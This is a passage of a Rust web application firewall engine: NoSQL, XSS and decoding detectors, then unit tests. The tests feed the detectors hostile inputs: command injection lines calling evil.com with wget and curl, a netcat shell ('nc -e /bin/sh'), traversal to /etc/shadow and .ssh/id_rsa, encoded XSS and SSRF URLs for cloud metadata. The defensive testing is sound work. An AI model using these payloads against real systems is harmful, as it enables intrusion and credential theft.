1917/// - Redis dangerous commands
1918/// - Cassandra CQL injection
1919/// - JSON prototype pollution (__proto__, constructor)
1920///
1921/// Returns 1 if NoSQL injection patterns are detected, 0 otherwise.
1922fn nosql_analyzer_score(value: &str) -> u32 {
1923    // Check raw value first
1924    if check_nosql_patterns(value) {
1925        return 1;
1926    }
1927
1928    // URL-decode and check again (handles %24where -> $where)
1929    let decoded = safe_percent_decode(value);
1930    if decoded != value && check_nosql_patterns(&decoded) {
1931        return 1;
1932    }
1933
1934    // Double-decode for nested encoding bypass
1935    if decoded.contains('%') {
1936        let double_decoded = safe_percent_decode(&decoded);
1937        if double_decoded != decoded && check_nosql_patterns(&double_decoded) {
1938            return 1;
1939        }
1940    }
1941
1942    0
1943}
1944
1945/// Check NoSQL injection patterns against a value.
1946///
1947/// SECURITY: This function is critical for NoSQL injection prevention.
1948#[inline]
1949fn check_nosql_patterns(value: &str) -> bool {
1950    // HIGH RISK: $where with JavaScript (can execute arbitrary code)
1951    if NOSQL_WHERE_JS.is_match(value) {
1952        return true;
1953    }
1954
1955    // Authentication bypass attempts (e.g., {"password": {"$ne": null}})
1956    if NOSQL_AUTH_BYPASS.is_match(value) {
1957        return true;
1958    }
1959
1960    // JSON prototype pollution (can lead to RCE in Node.js)
1961    if JSON_PROTO_POLLUTION.is_match(value) {
1962        return true;
1963    }
1964
1965    // MongoDB operators (lower priority, more common in legitimate queries)
1966    NOSQL_MONGO_OPERATORS.is_match(value)
1967        || NOSQL_AGGREGATION.is_match(value)
1968        || NOSQL_COUCHDB.is_match(value)
1969        || NOSQL_REDIS.is_match(value)
1970        || NOSQL_CASSANDRA.is_match(value)
1971}
1972
1973/// Analyzes a value for XSS patterns.
1974///
1975/// SECURITY: Decodes HTML entities before pattern matching to prevent bypass
1976/// via entity encoding (e.g., `&#60;script&#62;` instead of `<script>`).
1977fn xss_analyzer_score(value: &str) -> u32 {
1978    // First check the raw value
1979    if check_xss_patterns(value) {
1980        return 1;
1981    }
1982
1983    // Decode HTML entities and check again
1984    let decoded = decode_html_entities(value);
1985    if decoded != value && check_xss_patterns(&decoded) {
1986        return 1;
1987    }
1988
1989    // Try double-decoding for nested encoding attacks
1990    if decoded.contains('&') {
1991        let double_decoded = decode_html_entities(&decoded);
1992        if double_decoded != decoded && check_xss_patterns(&double_decoded) {
1993            return 1;
1994        }
1995    }
1996
1997    0
1998}
1999
2000/// Check XSS patterns against a value.
2001#[inline]
2002fn check_xss_patterns(value: &str) -> bool {
2003    XSS_SCRIPT.is_match(value)
2004        || XSS_JS_SCHEME.is_match(value)
2005        || XSS_ON_ATTR.is_match(value)
2006        || XSS_COOKIE.is_match(value)
2007        || XSS_IMG_SRC.is_match(value)
2008}
2009
2010/// Decode HTML entities in a string.
2011///
2012/// Handles:
2013/// - Decimal entities: &#60; -> <
2014/// - Hexadecimal entities: &#x3C; or &#X3C; -> <
2015/// - Named entities: &lt; -> <, &gt; -> >, &amp; -> &, &quot; -> ", &apos; -> '
2016///
2017/// SECURITY: This is used to normalize input before XSS pattern matching
2018/// to prevent bypass via HTML entity encoding.
2019fn decode_html_entities(value: &str) -> String {
2020    if !value.contains('&') {
2021        return value.to_string();
2022    }
2023
2024    let mut result = String::with_capacity(value.len());
2025    let mut chars = value.chars().peekable();
2026
2027    while let Some(c) = chars.next() {
2028        if c == '&' {
2029            let mut entity = String::new();
2030            let mut found_semicolon = false;
2031
2032            // Collect entity characters (max 10 to prevent DoS)
2033            for _ in 0..10 {
2034                match chars.peek() {
2035                    Some(';') => {
2036                        chars.next();
2037                        found_semicolon = true;
2038                        break;
2039                    }
2040                    Some(&ch) if ch.is_ascii_alphanumeric() || ch == '#' => {
2041                        if let Some(next) = chars.next() {
2042                            entity.push(next);
2043                        } else {
2044                            break;
2045                        }
2046                    }
2047                    _ => break,
2048                }
2049            }
2050
2051            if found_semicolon && !entity.is_empty() {
2052                if let Some(decoded) = decode_single_entity(&entity) {
2053                    result.push(decoded);
2054                    continue;
2055                }
2056            }
2057
2058            // Not a valid entity, output as-is
2059            result.push('&');
2060            result.push_str(&entity);
2061            if found_semicolon {
2062                result.push(';');
2063            }
2064        } else {
2065            result.push(c);
2066        }
2067    }
2068
2069    result
2070}
2071
2072/// Decode a single HTML entity (without & and ;).
2073fn decode_single_entity(entity: &str) -> Option<char> {
2074    // Decimal: &#60;
2075    if let Some(num_str) = entity.strip_prefix('#') {
2076        // Hexadecimal: &#x3C; or &#X3C;
2077        if let Some(hex_str) = num_str
2078            .strip_prefix('x')
2079            .or_else(|| num_str.strip_prefix('X'))
2080        {
2081            if let Ok(code) = u32::from_str_radix(hex_str, 16) {
2082                return char::from_u32(code);
2083            }
2084        } else if let Ok(code) = num_str.parse::<u32>() {
2085            return char::from_u32(code);
2086        }
2087        return None;
2088    }
2089
2090    // Named entities (common XSS-relevant ones)
2091    match entity {
2092        "lt" => Some('<'),
2093        "gt" => Some('>'),
2094        "amp" => Some('&'),
2095        "quot" => Some('"'),
2096        "apos" => Some('\''),
2097        "nbsp" => Some('\u{00A0}'),
2098        // Additional commonly abused entities
2099        "tab" | "Tab" => Some('\t'),
2100        "newline" | "NewLine" => Some('\n'),
2101        "colon" => Some(':'),
2102        "sol" => Some('/'),
2103        "equals" => Some('='),
2104        "lpar" => Some('('),
2105        "rpar" => Some(')'),
2106        "lsqb" | "lbrack" => Some('['),
2107        "rsqb" | "rbrack" => Some(']'),
2108        "lcub" | "lbrace" => Some('{'),
2109        "rcub" | "rbrace" => Some('}'),
2110        "semi" => Some(';'),
2111        "comma" => Some(','),
2112        "period" | "dot" => Some('.'),
2113        "excl" => Some('!'),
2114        "quest" => Some('?'),
2115        "num" => Some('#'),
2116        "percnt" => Some('%'),
2117        "plus" => Some('+'),
2118        "minus" | "dash" => Some('-'),
2119        "ast" | "midast" => Some('*'),
2120        "verbar" | "vert" => Some('|'),
2121        "bsol" => Some('\\'),
2122        "circ" => Some('^'),
2123        "grave" => Some('`'),
2124        "tilde" => Some('~'),
2125        "at" => Some('@'),
2126        _ => None,
2127    }
2128}
2129
2130fn safe_percent_decode(value: &str) -> String {
2131    // Handle form encoding (+ -> space) first
2132    let replaced = value.replace('+', " ");
2133    percent_decode_str(&replaced)
2134        .decode_utf8()
2135        .map(|c| c.into_owned())
2136        .unwrap_or_else(|_| value.to_string())
2137}
2138
2139fn decode_if_base64(value: &str) -> String {
2140    let sanitized = value.trim();
2141    if sanitized.len() < 8 {
2142        return value.to_string();
2143    }
2144
2145    // Try standard Base64 first
2146    if let Ok(bytes) = BASE64_STANDARD.decode(sanitized.as_bytes()) {
2147        if let Ok(decoded) = String::from_utf8(bytes) {
2148            if !decoded.is_empty() {
2149                return decoded;
2150            }
2151        }
2152    }
2153
2154    // Try URL-safe Base64 (common in web payloads)
2155    use base64::engine::general_purpose::URL_SAFE_NO_PAD;
2156    if let Ok(bytes) = URL_SAFE_NO_PAD.decode(sanitized.as_bytes()) {
2157        if let Ok(decoded) = String::from_utf8(bytes) {
2158            if !decoded.is_empty() {
2159                return decoded;
2160            }
2161        }
2162    }
2163
2164    value.to_string()
2165}
2166
2167fn build_raw_request(ctx: &EvalContext) -> String {
2168    let mut out = String::new();
2169    out.push_str(&format!("{} {} HTTP/1.1", ctx.method, ctx.url));
2170    out.push('\n');
2171    for (key, value) in &ctx.headers {
2172        out.push_str(key);
2173        out.push_str(": ");
2174        out.push_str(value);
2175        out.push('\n');
2176    }
2177    out.push('\n');
2178    if let Some(body) = ctx.body_text {
2179        out.push_str(body);
2180    }
2181    out
2182}
2183
2184fn extract_multipart_boundary(content_type: &str) -> Option<String> {
2185    content_type
2186        .split(';')
2187        .map(|p| p.trim())
2188        .find_map(|p| {
2189            let (key, value) = p.split_once('=')?;
2190            if key.trim().eq_ignore_ascii_case("boundary") {
2191                Some(value.trim().trim_matches('"').to_string())
2192            } else {
2193                None
2194            }
2195        })
2196        .filter(|b| !b.is_empty())
2197}
2198
2199fn parse_multipart_values(raw_body: &[u8], boundary: &str) -> Vec<String> {
2200    let body = String::from_utf8_lossy(raw_body);
2201    let marker = format!("--{}", boundary);
2202    let mut out = Vec::new();
2203    for part in body.split(&marker) {
2204        let mut p = part.trim_matches('\r').trim_matches('\n').trim();
2205        if p.is_empty() || p == "--" {
2206            continue;
2207        }
2208        if p.starts_with("--") {
2209            continue;
2210        }
2211        if p.starts_with("\r\n") {
2212            p = &p[2..];
2213        }
2214        if let Some((_, rest)) = p.split_once("\r\n\r\n") {
2215            let value = rest.trim_end_matches("\r\n").trim().to_string();
2216            if !value.is_empty() {
2217                out.push(value);
2218            }
2219        }
2220    }
2221    out
2222}
2223
2224fn select_argument_values(
2225    engine: &Engine,
2226    selector: Option<&MatchCondition>,
2227    ctx: &EvalContext,
2228) -> Vec<String> {
2229    let mut values = Vec::new();
2230    for entry in &ctx.arg_entries {
2231        if selector
2232            .map(|sel| matches_selector(engine, sel, &entry.key))
2233            .unwrap_or(true)
2234        {
2235            values.push(entry.value.clone());
2236        }
2237    }
2238    values
2239}
2240
2241fn matches_selector(engine: &Engine, selector: &MatchCondition, candidate: &str) -> bool {
2242    match selector.kind.as_str() {
2243        "to_lowercase" => {
2244            let lowered = candidate.to_lowercase();
2245            selector
2246                .match_value
2247                .as_ref()
2248                .and_then(|m| m.as_cond())
2249                .map(|child| matches_selector(engine, child, &lowered))
2250                .unwrap_or(true)
2251        }
2252        "regex" => engine.eval_regex(selector.match_value.as_ref(), Some(candidate)),
2253        "hashset" => eval_hashset(selector.match_value.as_ref(), Some(candidate)),
2254        "multiple_contains" => {
2255            eval_multiple_contains(selector.match_value.as_ref(), Some(candidate))
2256        }
2257        "contains" => eval_contains(selector.match_value.as_ref(), Some(candidate)),
2258        "equals" => eval_equals(selector.match_value.as_ref(), Some(candidate)),
2259        _ => false,
2260    }
2261}
2262
2263fn collect_regex_patterns(condition: &MatchCondition, out: &mut Vec<String>) {
2264    if condition.kind == "regex" {
2265        if let Some(MatchValue::Str(s)) = condition.match_value.as_ref() {
2266            out.push(s.clone());
2267        }
2268    }
2269    if let Some(mv) = condition.match_value.as_ref() {
2270        if let Some(child) = mv.as_cond() {
2271            collect_regex_patterns(child, out);
2272        } else if let Some(arr) = mv.as_arr() {
2273            for item in arr {
2274                if let Some(child) = item.as_cond() {
2275                    collect_regex_patterns(child, out);
2276                }
2277            }
2278        }
2279    }
2280    if let Some(selector) = condition.selector.as_ref() {
2281        collect_regex_patterns(selector, out);
2282    }
2283}
2284
2285fn collect_word_values(condition: &MatchCondition, out: &mut Vec<String>) {
2286    if condition.kind == "word" {
2287        if let Some(MatchValue::Str(s)) = condition.match_value.as_ref() {
2288            out.push(s.clone());
2289        }
2290    }
2291    if let Some(mv) = condition.match_value.as_ref() {
2292        if let Some(child) = mv.as_cond() {
2293            collect_word_values(child, out);
2294        } else if let Some(arr) = mv.as_arr() {
2295            for item in arr {
2296                if let Some(child) = item.as_cond() {
2297                    collect_word_values(child, out);
2298                }
2299            }
2300        }
2301    }
2302    if let Some(selector) = condition.selector.as_ref() {
2303        collect_word_values(selector, out);
2304    }
2305}
2306
2307#[cfg(test)]
2308mod tests {
2309    use super::*;
2310    use crate::waf::types::Header;
2311
2312    #[test]
2313    fn test_empty_engine() {
2314        let engine = Engine::empty();
2315        assert_eq!(engine.rule_count(), 0);
2316    }
2317
2318    #[test]
2319    fn test_load_rules() {
2320        let mut engine = Engine::empty();
2321        let rules = r#"[
2322            {
2323                "id": 1,
2324                "description": "SQL injection",
2325                "risk": 10.0,
2326                "blocking": true,
2327                "matches": [
2328                    {"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
2329                ]
2330            }
2331        ]"#;
2332        let count = engine.load_rules(rules.as_bytes()).unwrap();
2333        assert_eq!(count, 1);
2334    }
2335
2336    #[test]
2337    fn test_analyze_sqli() {
2338        let mut engine = Engine::empty();
2339        let rules = r#"[
2340            {
2341                "id": 1,
2342                "description": "SQL injection",
2343                "risk": 10.0,
2344                "blocking": true,
2345                "matches": [
2346                    {"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
2347                ]
2348            }
2349        ]"#;
2350        engine.load_rules(rules.as_bytes()).unwrap();
2351
2352        let verdict = engine.analyze(&Request {
2353            method: "GET",
2354            path: "/api/users?id=1' OR '1'='1",
2355            ..Default::default()
2356        });
2357
2358        assert_eq!(verdict.action, Action::Block);
2359        assert!(verdict.risk_score > 0);
2360        assert!(verdict.matched_rules.contains(&1));
2361    }
2362
2363    #[test]
2364    fn test_sql_analyzer() {
2365        // SQL phrases detection
2366        assert!(sql_analyzer_score("SELECT * FROM users") > 0);
2367        assert!(sql_analyzer_score("SELECT * FROM information_schema") > 0);
2368        assert!(sql_analyzer_score("INSERT INTO users") > 0);
2369        assert!(sql_analyzer_score("DELETE FROM users") > 0);
2370        assert!(sql_analyzer_score("UNION SELECT * FROM users") > 0);
2371        // SQL comment injection
2372        assert!(sql_analyzer_score("admin' --") > 0);
2373        // Normal text should not match
2374        assert!(sql_analyzer_score("hello world") == 0);
2375        assert!(sql_analyzer_score("normal query string") == 0);
2376    }
2377
2378    #[test]
2379    fn test_xss_analyzer() {
2380        assert!(xss_analyzer_score("<script>alert(1)</script>") > 0);
2381        assert!(xss_analyzer_score("javascript:alert(1)") > 0);
2382        assert!(xss_analyzer_score("onclick=alert(1)") > 0);
2383        assert!(xss_analyzer_score("hello world") == 0);
2384    }
2385
2386    /// SECURITY TEST: Verify XSS detection cannot be bypassed via HTML entity encoding.
2387    #[test]
2388    fn test_xss_analyzer_html_entity_bypass() {
2389        // Decimal entity encoding bypass attempts
2390        assert!(
2391            xss_analyzer_score("&#60;script&#62;alert(1)&#60;/script&#62;") > 0,
2392            "Should detect <script> via decimal entities"
2393        );
2394
2395        // Hex entity encoding bypass attempts
2396        assert!(
2397            xss_analyzer_score("&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;") > 0,
2398            "Should detect <script> via hex entities"
2399        );
2400
2401        // Named entity encoding bypass attempts
2402        assert!(
2403            xss_analyzer_score("&lt;script&gt;alert(1)&lt;/script&gt;") > 0,
2404            "Should detect <script> via named entities"
2405        );
2406
2407        // Mixed encoding
2408        assert!(
2409            xss_analyzer_score("&#60;script&gt;alert(1)&#x3C;/script>") > 0,
2410            "Should detect <script> via mixed entities"
2411        );
2412
2413        // javascript: scheme with entity encoding
2414        assert!(
2415            xss_analyzer_score(
2416                "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)"
2417            ) > 0,
2418            "Should detect javascript: via decimal entities"
2419        );
2420
2421        // onerror with entity encoding
2422        assert!(
2423            xss_analyzer_score("&#111;&#110;&#101;&#114;&#114;&#111;&#114;=alert(1)") > 0,
2424            "Should detect onerror via decimal entities"
2425        );
2426
2427        // document.cookie with entities
2428        assert!(
2429            xss_analyzer_score("&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;") > 0,
2430            "Should detect document.cookie via decimal entities"
2431        );
2432
2433        // Uppercase hex entities
2434        assert!(
2435            xss_analyzer_score("&#X3C;script&#X3E;") > 0,
2436            "Should detect script tag with uppercase hex"
2437        );
2438
2439        // img tag with entity encoding
2440        assert!(
2441            xss_analyzer_score("&#60;img src=x onerror=alert(1)&#62;") > 0,
2442            "Should detect img tag via entities"
2443        );
2444    }
2445
2446    /// Test HTML entity decoder directly.
2447    #[test]
2448    fn test_decode_html_entities() {
2449        // Decimal entities
2450        assert_eq!(decode_html_entities("&#60;"), "<");
2451        assert_eq!(decode_html_entities("&#62;"), ">");
2452        assert_eq!(decode_html_entities("&#60;script&#62;"), "<script>");
2453
2454        // Hex entities
2455        assert_eq!(decode_html_entities("&#x3C;"), "<");
2456        assert_eq!(decode_html_entities("&#x3E;"), ">");
2457        assert_eq!(decode_html_entities("&#X3C;script&#X3E;"), "<script>");
2458
2459        // Named entities
2460        assert_eq!(decode_html_entities("&lt;"), "<");
2461        assert_eq!(decode_html_entities("&gt;"), ">");
2462        assert_eq!(decode_html_entities("&amp;"), "&");
2463        assert_eq!(decode_html_entities("&quot;"), "\"");
2464        assert_eq!(decode_html_entities("&apos;"), "'");
2465
2466        // Mixed content
2467        assert_eq!(decode_html_entities("hello &lt;world&gt;"), "hello <world>");
2468
2469        // No entities
2470        assert_eq!(decode_html_entities("no entities here"), "no entities here");
2471
2472        // Invalid entities pass through
2473        assert_eq!(decode_html_entities("&unknown;"), "&unknown;");
2474        assert_eq!(decode_html_entities("&;"), "&;");
2475
2476        // Incomplete entities
2477        assert_eq!(decode_html_entities("&lt"), "&lt");
2478    }
2479
2480    /// Test double-decoding detection for nested encoding attacks.
2481    #[test]
2482    fn test_xss_double_encoding_bypass() {
2483        // Double-encoded <script> tag: first decode gives &#60;, second gives <
2484        // &amp;#60; -> &#60; -> <
2485        assert!(
2486            xss_analyzer_score("&amp;#60;script&amp;#62;") > 0,
2487            "Should detect double-encoded script tag"
2488        );
2489    }
2490
2491    /// Test command injection detection.
2492    #[test]
2493    fn test_cmd_analyzer() {
2494        // Backtick command execution
2495        assert!(
2496            cmd_analyzer_score(r"`cat /etc/passwd`") > 0,
2497            "Should detect backtick execution"
2498        );
2499        assert!(
2500            cmd_analyzer_score(r"`id`") > 0,
2501            "Should detect simple backtick"
2502        );
2503
2504        // $() command substitution
2505        assert!(
2506            cmd_analyzer_score(r"$(cat /etc/passwd)") > 0,
2507            "Should detect subshell execution"
2508        );
2509        assert!(
2510            cmd_analyzer_score(r"$(whoami)") > 0,
2511            "Should detect simple subshell"
2512        );
2513
2514        // Variable substitution
2515        assert!(
2516            cmd_analyzer_score(r"${PATH}") > 0,
2517            "Should detect variable substitution"
2518        );
2519        assert!(
2520            cmd_analyzer_score(r"${IFS}") > 0,
2521            "Should detect IFS substitution"
2522        );
2523
2524        // IFS manipulation
2525        assert!(cmd_analyzer_score(r"$IFS") > 0, "Should detect $IFS");
2526        assert!(
2527            cmd_analyzer_score(r"IFS=x") > 0,
2528            "Should detect IFS assignment"
2529        );
2530
2531        // Dangerous commands
2532        assert!(
2533            cmd_analyzer_score(r"cat /etc/passwd") > 0,
2534            "Should detect /etc/passwd access"
2535        );
2536        assert!(
2537            cmd_analyzer_score(r"cat /etc/shadow") > 0,
2538            "Should detect /etc/shadow access"
2539        );
2540        assert!(
2541            cmd_analyzer_score(r"wget http://evil.com/shell.sh") > 0,
2542            "Should detect wget"
2543        );
2544        assert!(
2545            cmd_analyzer_score(r"curl http://evil.com") > 0,
2546            "Should detect curl"
2547        );
2548        assert!(
2549            cmd_analyzer_score(r"nc -e /bin/sh") > 0,
2550            "Should detect netcat"
2551        );
2552        assert!(cmd_analyzer_score(r"bash -i") > 0, "Should detect bash -i");
2553        assert!(
2554            cmd_analyzer_score(r"/bin/sh -c 'cmd'") > 0,
2555            "Should detect /bin/sh -c"
2556        );
2557
2558        // Clean values should not match
2559        assert!(
2560            cmd_analyzer_score("hello world") == 0,
2561            "Clean value should not match"
2562        );
2563        assert!(
2564            cmd_analyzer_score("user@example.com") == 0,
2565            "Email should not match"
2566        );
2567    }
2568
2569    /// SECURITY TEST: Verify command injection detection via newline encoding.
2570    #[test]
2571    fn test_cmd_analyzer_newline_bypass() {
2572        // URL-encoded newlines
2573        assert!(
2574            cmd_analyzer_score("id%0acat /etc/passwd") > 0,
2575            "Should detect %0a newline injection"
2576        );
2577        assert!(
2578            cmd_analyzer_score("cmd%0dmore") > 0,
2579            "Should detect %0d carriage return injection"
2580        );
2581        assert!(
2582            cmd_analyzer_score("%0A%0D") > 0,
2583            "Should detect uppercase encoded CRLF"
2584        );
2585
2586        // Double-encoded newlines
2587        assert!(
2588            cmd_analyzer_score("id%250acat") > 0,
2589            "Should detect double-encoded newline"
2590        );
2591    }
2592
2593    /// SECURITY TEST: Verify command injection detection via IFS and variable substitution.
2594    #[test]
2595    fn test_cmd_analyzer_ifs_bypass() {
2596        // IFS bypass techniques
2597        assert!(
2598            cmd_analyzer_score(r"cat${IFS}/etc/passwd") > 0,
2599            "Should detect $IFS brace bypass"
2600        );
2601        assert!(
2602            cmd_analyzer_score(r"cat$IFS/etc/passwd") > 0,
2603            "Should detect $IFS bypass"
2604        );
2605        assert!(
2606            cmd_analyzer_score(r"{cat,/etc/passwd}") > 0,
2607            "Should detect brace expansion"
2608        );
2609    }
2610
2611    /// SECURITY TEST: Verify null byte injection detection.
2612    #[test]
2613    fn test_cmd_analyzer_null_byte() {
2614        assert!(
2615            cmd_analyzer_score("file.txt%00.jpg") > 0,
2616            "Should detect %00 null byte"
2617        );
2618        assert!(
2619            cmd_analyzer_score("cmd\\x00param") > 0,
2620            "Should detect \\x00 null byte"
2621        );
2622    }
2623
2624    /// Test basic path traversal detection.
2625    #[test]
2626    fn test_path_traversal_analyzer_basic() {
2627        // Basic path traversal
2628        assert!(
2629            path_traversal_analyzer_score("../etc/passwd") > 0,
2630            "Should detect basic ../"
2631        );
2632        assert!(
2633            path_traversal_analyzer_score("..\\Windows\\System32") > 0,
2634            "Should detect basic ..\\"
2635        );
2636        assert!(
2637            path_traversal_analyzer_score("....//etc/passwd") > 0,
2638            "Should detect multiple dots"
2639        );
2640
2641        // Clean paths should not match
2642        assert!(
2643            path_traversal_analyzer_score("/home/user/file.txt") == 0,
2644            "Clean path should not match"
2645        );
2646        assert!(
2647            path_traversal_analyzer_score("relative/path/to/file") == 0,
2648            "Relative path without traversal should not match"
2649        );
2650    }
2651
2652    /// SECURITY TEST: Verify path traversal detection via URL encoding bypass.
2653    #[test]
2654    fn test_path_traversal_url_encoding_bypass() {
2655        // Single URL-encoded
2656        assert!(
2657            path_traversal_analyzer_score("%2e%2e%2fetc/passwd") > 0,
2658            "Should detect %2e%2e%2f (URL-encoded ../)"
2659        );
2660        assert!(
2661            path_traversal_analyzer_score("..%2fetc/passwd") > 0,
2662            "Should detect ..%2f (partial encoding)"
2663        );
2664        assert!(
2665            path_traversal_analyzer_score("%2e%2e/etc/passwd") > 0,
2666            "Should detect %2e%2e/ (partial encoding)"
2667        );
2668
2669        // Uppercase encoding
2670        assert!(
2671            path_traversal_analyzer_score("%2E%2E%2Fetc/passwd") > 0,
2672            "Should detect uppercase %2E%2E%2F"
2673        );
2674    }
2675
2676    /// SECURITY TEST: Verify path traversal detection via double URL encoding bypass.
2677    #[test]
2678    fn test_path_traversal_double_encoding_bypass() {
2679        // Double URL-encoded: %252e = %2e after first decode = . after second
2680        assert!(
2681            path_traversal_analyzer_score("%252e%252e%252fetc/passwd") > 0,
2682            "Should detect double-encoded %252e%252e%252f"
2683        );
2684        assert!(
2685            path_traversal_analyzer_score("%252E%252E%252F") > 0,
2686            "Should detect uppercase double-encoded"
2687        );
2688
2689        // Triple encoding (extreme case)
2690        assert!(
2691            path_traversal_analyzer_score("%25252e%25252e%25252f") > 0,
2692            "Should detect triple-encoded path traversal"
2693        );
2694    }
2695
2696    /// SECURITY TEST: Verify path traversal detection via Unicode/overlong UTF-8 bypass.
2697    #[test]
2698    fn test_path_traversal_unicode_bypass() {
2699        // Overlong UTF-8 encoding of '.'
2700        assert!(
2701            path_traversal_analyzer_score("%c0%ae%c0%ae/etc/passwd") > 0,
2702            "Should detect overlong UTF-8 %c0%ae (dot)"
2703        );
2704        // Overlong UTF-8 encoding of '/'
2705        assert!(
2706            path_traversal_analyzer_score("..%c0%afetc/passwd") > 0,
2707            "Should detect overlong UTF-8 %c0%af (slash)"
2708        );
2709        // Mixed
2710        assert!(
2711            path_traversal_analyzer_score("%c0%ae%c0%ae%c0%afetc%c0%afpasswd") > 0,
2712            "Should detect mixed overlong encoding"
2713        );
2714    }
2715
2716    /// SECURITY TEST: Verify path traversal detection for Windows-specific patterns.
2717    #[test]
2718    fn test_path_traversal_windows_patterns() {
2719        // Backslash variants
2720        assert!(
2721            path_traversal_analyzer_score("..\\..\\boot.ini") > 0,
2722            "Should detect Windows backslash traversal"
2723        );
2724        assert!(
2725            path_traversal_analyzer_score("%2e%2e%5c") > 0,
2726            "Should detect %5c (encoded backslash)"
2727        );
2728
2729        // Windows sensitive files
2730        assert!(
2731            path_traversal_analyzer_score("..\\..\\Windows\\System32\\config\\SAM") > 0,
2732            "Should detect SAM file access"
2733        );
2734        assert!(
2735            path_traversal_analyzer_score("..\\..\\boot.ini") > 0,
2736            "Should detect boot.ini access"
2737        );
2738    }
2739
2740    /// SECURITY TEST: Verify path traversal detection for sensitive Unix files.
2741    #[test]
2742    fn test_path_traversal_unix_sensitive_targets() {
2743        // Unix sensitive files with traversal context
2744        assert!(
2745            path_traversal_analyzer_score("../../etc/passwd") > 0,
2746            "Should detect /etc/passwd access"
2747        );
2748        assert!(
2749            path_traversal_analyzer_score("..%2f..%2fetc%2fshadow") > 0,
2750            "Should detect encoded /etc/shadow access"
2751        );
2752        assert!(
2753            path_traversal_analyzer_score("../../.ssh/id_rsa") > 0,
2754            "Should detect .ssh access"
2755        );
2756        assert!(
2757            path_traversal_analyzer_score("../../proc/self/environ") > 0,
2758            "Should detect /proc access"
2759        );
2760    }
2761
2762    /// SECURITY TEST: Verify null byte truncation detection.
2763    #[test]
2764    fn test_path_traversal_null_byte() {
2765        assert!(
2766            path_traversal_analyzer_score("../etc/passwd%00.jpg") > 0,
2767            "Should detect null byte truncation"
2768        );
2769        assert!(
2770            path_traversal_analyzer_score("file.txt\\x00../etc/passwd") > 0,
2771            "Should detect \\x00 null byte"
2772        );
2773    }
2774
2775    /// Test the normalize_unicode_path helper function.
2776    #[test]
2777    fn test_normalize_unicode_path() {
2778        // Dot normalization
2779        assert_eq!(normalize_unicode_path("%c0%ae"), ".");
2780        assert_eq!(normalize_unicode_path("%C0%AE"), ".");
2781        assert_eq!(normalize_unicode_path("%e0%80%ae"), ".");
2782
2783        // Slash normalization
2784        assert_eq!(normalize_unicode_path("%c0%af"), "/");
2785        assert_eq!(normalize_unicode_path("%C0%AF"), "/");
2786
2787        // Backslash normalization
2788        assert_eq!(normalize_unicode_path("%c1%9c"), "\\");
2789        assert_eq!(normalize_unicode_path("%C1%9C"), "\\");
2790
2791        // Combined
2792        assert_eq!(normalize_unicode_path("%c0%ae%c0%ae%c0%af"), "../");
2793    }
2794
2795    // ==================== SSRF Detection Tests ====================
2796
2797    /// Test SSRF detection for localhost addresses.
2798    #[test]
2799    fn test_ssrf_analyzer_localhost() {
2800        // IPv4 localhost
2801        assert!(
2802            ssrf_analyzer_score("http://127.0.0.1/") > 0,
2803            "Should detect 127.0.0.1"
2804        );
2805        assert!(
2806            ssrf_analyzer_score("http://127.0.0.2/admin") > 0,
2807            "Should detect 127.0.0.x"
2808        );
2809        assert!(
2810            ssrf_analyzer_score("https://127.255.255.255:8080/") > 0,
2811            "Should detect 127.x.x.x"
2812        );
2813
2814        // IPv6 localhost
2815        assert!(
2816            ssrf_analyzer_score("http://[::1]/") > 0,
2817            "Should detect ::1"
2818        );
2819        assert!(
2820            ssrf_analyzer_score("http://[0:0:0:0:0:0:0:1]/") > 0,
2821            "Should detect full IPv6 localhost"
2822        );
2823    }
2824
2825    /// Test SSRF detection for cloud metadata endpoints.
2826    #[test]
2827    fn test_ssrf_analyzer_cloud_metadata() {
2828        // AWS/Azure/GCP metadata
2829        assert!(
2830            ssrf_analyzer_score("http://169.254.169.254/latest/meta-data/") > 0,
2831            "Should detect AWS metadata endpoint"
2832        );
2833        assert!(
2834            ssrf_analyzer_score("http://169.254.170.2/v2/credentials") > 0,
2835            "Should detect AWS ECS metadata"
2836        );
2837        assert!(
2838            ssrf_analyzer_score("http://metadata.google.internal/") > 0,
2839            "Should detect GCP metadata hostname"
2840        );
2841        assert!(
2842            ssrf_analyzer_score("http://metadata.azure.com/") > 0,
2843            "Should detect Azure metadata hostname"
2844        );
2845    }
2846
2847    /// Test SSRF detection for private IP ranges.
2848    #[test]
2849    fn test_ssrf_analyzer_private_ips() {
2850        // 10.0.0.0/8
2851        assert!(
2852            ssrf_analyzer_score("http://10.0.0.1/internal") > 0,
2853            "Should detect 10.x.x.x"
2854        );
2855        assert!(
2856            ssrf_analyzer_score("http://10.255.255.255/") > 0,
2857            "Should detect 10.255.255.255"
2858        );
2859
2860        // 192.168.0.0/16
2861        assert!(
2862            ssrf_analyzer_score("http://192.168.1.1/") > 0,
2863            "Should detect 192.168.x.x"
2864        );
2865        assert!(
2866            ssrf_analyzer_score("http://192.168.0.254:3000/") > 0,
2867            "Should detect with port"
2868        );
2869
2870        // 172.16.0.0/12
2871        assert!(
2872            ssrf_analyzer_score("http://172.16.0.1/") > 0,
2873            "Should detect 172.16.x.x"
2874        );
2875        assert!(
2876            ssrf_analyzer_score("http://172.31.255.255/") > 0,
2877            "Should detect 172.31.x.x"
2878        );
2879    }
2880
2881    /// Test SSRF detection for dangerous URL schemes.
2882    #[test]
2883    fn test_ssrf_analyzer_dangerous_schemes() {
2884        assert!(
2885            ssrf_analyzer_score("file:///etc/passwd") > 0,
2886            "Should detect file://"
2887        );
2888        assert!(
2889            ssrf_analyzer_score("gopher://internal:1234/") > 0,
2890            "Should detect gopher://"
2891        );
2892        assert!(
2893            ssrf_analyzer_score("dict://localhost:11211/") > 0,
2894            "Should detect dict://"
2895        );
2896        assert!(
2897            ssrf_analyzer_score("ldap://internal/") > 0,
2898            "Should detect ldap://"
2899        );
2900        assert!(
2901            ssrf_analyzer_score("expect://id") > 0,
2902            "Should detect expect://"
2903        );
2904        assert!(
2905            ssrf_analyzer_score("php://filter/convert.base64-encode") > 0,
2906            "Should detect php://"
2907        );
2908        assert!(
2909            ssrf_analyzer_score("data:text/html,<script>") > 0,
2910            "Should detect data:"
2911        );
2912    }
2913
2914    /// Test SSRF detection for IPv6-mapped IPv4 bypass attempts.
2915    #[test]
